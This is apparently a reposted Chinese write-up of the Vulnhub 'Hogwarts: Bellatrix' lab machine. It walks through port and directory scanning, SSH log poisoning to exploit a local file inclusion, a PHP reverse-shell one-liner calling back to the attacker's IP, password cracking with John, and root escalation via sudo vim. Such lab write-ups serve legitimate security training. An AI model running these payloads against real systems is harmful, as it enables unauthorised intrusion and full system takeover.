高考报名时间2022年11月1日还剩 距离2023年6月7日高考还有
栏目分类:
子分类:
返回
名师互学网用户登录
名师互学网
快速导航关闭
当前搜索
当前分类
前沿技术 软件开发 系统运维 产品运营 生活办公 面试经验 考试题库
子分类
人工智能 大数据 云计算 区块链 物联网 深度学习 机器学习 NLP 计算机视觉 语音识别 其他 大数据系统 数据可视化 数据挖掘与分析 其他 Docker/k8s 虚拟化 云平台 其他 基本原理 数字货币 智能合约 EOS应用 其他 通讯技术 嵌入式开发 单片机 物联网应用 HarmonyOS 其他 后端开发 Web开发 移动开发 游戏开发 Python Java 架构设计 C/C++/C# PHP .Net Go语言 R语言
实用工具
学习工具 小学数学练习 字帖生成 在线画板 函数绘制 拼音字母表 在线词典 黄历查询 亲戚关系计算 安全期计算 中国历史 Excel函数 模拟请求 json格式化 浏览器指纹
热门搜索
路由器设置 木托盘 宝塔面板 儿童python教程 心情低落 朋友圈 vim 双一流学科 专升本 我的学校 日记学校 西点培训学校 汽修学校 情书 化妆学校 塔沟武校 异形模板 西南大学排名 最精辟人生短句 6步教你追回被骗的钱 南昌大学排名 清朝十二帝 北京印刷学院排名 北方工业大学排名 北京航空航天大学排名 首都经济贸易大学排名 中国传媒大学排名 首都师范大学排名 中国地质大学(北京)排名 北京信息科技大学排名
名师互学网 > IT > 系统运维 > 运维 > Linux

Vulnhub靶机

Linux 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

Vulnhub靶机

文章目录
    • 靶机介绍
    • 渗透过程
        • 靶机IP
        • 端口扫描
        • 扫描网站目录
        • 本地文件包含漏洞污染ssh日志文件getshell
        • 提权

靶机介绍

下载地址:http://www.vulnhub.com/entry/hogwarts-bellatrix,609/
难度:中等
靶机描述:

The evil Bellatrix Lestrange has escaped from the prison of Azkaban, but as … Find out and tell the Minister of Magic
Difficult: Medium
This works better in VirtualBox
Hints --> Brute force is not necessary, unless it is required. ncat is the key 
Social-Media: Twitter --> @BertrandLorent9, Instagram --> @BertrandLorente9

给的提示说ncat很重要。

渗透过程 靶机IP 
arp-scan -l

得到靶机的IP为192.168.1.103

端口扫描 
nmap -A -T4 -p 1-65535 192.168.1.103

这里靶机开启了两个端口22和80。

扫描网站目录 
dirb http://192.168.1.103

本地文件包含漏洞污染ssh日志文件getshell

访问扫描到的http://192.168.1.103/index.php,打开之后是哈利波特里面的贝拉特里克斯,然后是满屏的“我杀了小天狼星”。

查看网页源码,这里注释里给了一个提示ikilledsiriusblack.php,然后下面被注释起来的代码可以看到可能存在本地文件包含漏洞(LFI),而且应该是用file命令。
在Vulnhub靶机_EVILBOX: ONE中我们已经见到过这个漏洞了。这次尝试用同样的方法发现不能获取到ssh密钥。可以通过污染ssh日志来getshell。

  1. 首先我们发现可以访问/var/log/auth.log
http://192.168.1.103/ikilledsiriusblack.php?file=/var/log/auth.log

  1. 污染ssh日志文件。
    由于这个auth.log文件是我们尝试连接服务器时为每次成功和失败的登录尝试生成日志。那么就可以利用这个功能,发送恶意PHP代码将恶意代码作为新日志自动添加到auth.log文件中。在访问的时候就会执行我们加的恶意代码。
    比如我们登录一个ssh,随便敲密码。

    访问auth.log,他就会执行我们的命令。

那么我们用以下方式获取shell。

ssh ''@192.168.1.103

  1. 构造反弹shell脚本,我们查看本地IP是192.168.1.101

    然后我们构造以下的网址来获取shell,端口号这里我填的4444。
http://192.168.1.103/ikilledsiriusblack.php?file=/var/log/auth.log&shell=php -r '$sock=fsockopen("192.168.1.101",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

然后用url编码器把shell后面的部分进行编码。

  1. 访问构造好的网址,同时用nc监听
http://192.168.1.103/ikilledsiriusblack.php?file=/var/log/auth.log&shell=php%20-r%20%27%24sock%3Dfsockopen(%22192.168.1.101%22%2C4444)%3Bexec(%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22)%3B%27

提权

/var/www/html目录下有一个base64编码的文件夹,解码后是secret的意思。

这个文件夹内有两个文件,其中.secret.dic应该是一个字典,Swordofgryffindor里面是lestrange的密钥乱码。

把字典和Swordofgryffindor复制到自己的kali里面,用John破解密码。
得到用户lestrange的密码ihateharrypotter。


切换用户,查看lestrange可以执行的sudo命令

这里(ALL:ALL) NOPASSWORD: /usr/bin/vim说明它可以免密用root权限使用vim命令。我们就可以使用以下命令获取root权限。vim中叹号会直接从编辑器中执行我们写的命令/bin/sh,从而获取root权限。

sudo vim -c ':!/bin/sh'


root目录下的flag。

bellatrix下的flag。

lestranger下的flag。

结束。

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/361525.html

Linux相关栏目本月热门文章

热门相关搜索
路由器设置 木托盘 宝塔面板 儿童python教程 心情低落 朋友圈 vim 双一流学科 专升本 我的学校 日记学校 西点培训学校 汽修学校 情书 化妆学校 塔沟武校 异形模板 西南大学排名 最精辟人生短句 6步教你追回被骗的钱 南昌大学排名 清朝十二帝 北京印刷学院排名 北方工业大学排名 北京航空航天大学排名 首都经济贸易大学排名 中国传媒大学排名 首都师范大学排名 中国地质大学(北京)排名 北京信息科技大学排名 中央民族大学排名 北京舞蹈学院排名 北京电影学院排名 中国戏曲学院排名 河北政法职业学院排名 河北经贸大学排名 天津中德应用技术大学排名 天津医学高等专科学校排名 天津美术学院排名 天津音乐学院排名 天津工业大学排名 北京工业大学耿丹学院排名 北京警察学院排名 天津科技大学排名 北京邮电大学(宏福校区)排名 北京网络职业学院排名 北京大学医学部排名 河北科技大学排名 河北地质大学排名 河北体育学院排名
学习工具
代数计算器
三角函数
解析几何
立体几何
知识解答
教育知识
百科知识
生活知识
常识知识
写作必备
作文大全
作文素材
句子大全
实用范文
关于我们
关于我们
联系我们
网站地图
交流群

名师互学网交流群

名师互学网客服

名师互学网客服

名师互学网 版权所有 (c)2021-2022 ICP备案号:晋ICP备2021003244-6号

我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号